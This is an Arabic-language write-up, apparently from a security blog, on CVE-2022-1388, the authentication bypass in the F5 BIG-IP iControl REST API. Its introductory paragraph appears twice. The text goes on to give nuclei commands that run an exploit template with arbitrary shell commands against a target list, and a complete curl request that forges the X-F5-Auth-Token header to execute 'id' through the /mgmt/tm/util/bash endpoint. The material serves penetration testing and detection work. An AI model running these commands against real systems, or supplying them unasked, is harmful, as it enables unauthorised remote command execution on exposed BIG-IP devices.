
CVE-2022-1388 هي ثغرة تجاوز المصادقة في مكوّن REST الخاص بواجهة iControl API في أجهزة BIG-IP، وقد حصلت على درجة 9.8 في معيار CVSSv3. تُستخدم واجهة iControl REST API لإدارة أجهزة BIG-IP وتهيئتها. يمكن استغلال CVE-2022-1388 من قبل مهاجم غير مصادَق لديه وصول شبكي إلى منفذ الإدارة أو عناوين IP الذاتية للأجهزة التي تستخدم BIG-IP. من شأن استغلال هذه الثغرة أن يسمح للمهاجم بتنفيذ أوامر نظام تعسفية، وإنشاء الملفات وحذفها، وتعطيل الخدمات.
CVE-2022-1388 هو ثغرة لتجاوز المصادقة في مكوّن REST بواجهة iControl API الخاصة بـ BIG-IP، وقد حصلت على درجة CVSSv3 تبلغ 9.8. تُستخدم واجهة برمجة تطبيقات iControl REST لإدارة و تكوين أجهزة BIG-IP. يمكن استغلال CVE-2022-1388 من قبل مهاجم غير مصادَق يملك وصولًا شبكيًا إلى منفذ الإدارة أو عناوين IP الذاتية للأجهزة التي تستخدم BIG-IP. قد يؤدي الاستغلال إلى تمكين المهاجم من تنفيذ أوامر نظام تعسفية، وإنشاء وحذف الملفات وتعطيل الخدمات.
يقبل قالب nuclei هذا معامل أوامر (shell parameter) للاستغلال. أردنا اختبار الرموز (tokens) التي تم الحصول عليها من سير عمل آخر أو بحث يدوي، لذلك استخدمنا ميزة متغيرات CLI في nuclei لتغذية هذه القوالب برمز واحد أو قائمة رموز بشكل ديناميكي في وقت التشغيل
-V, -var value custom vars in var=value format
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'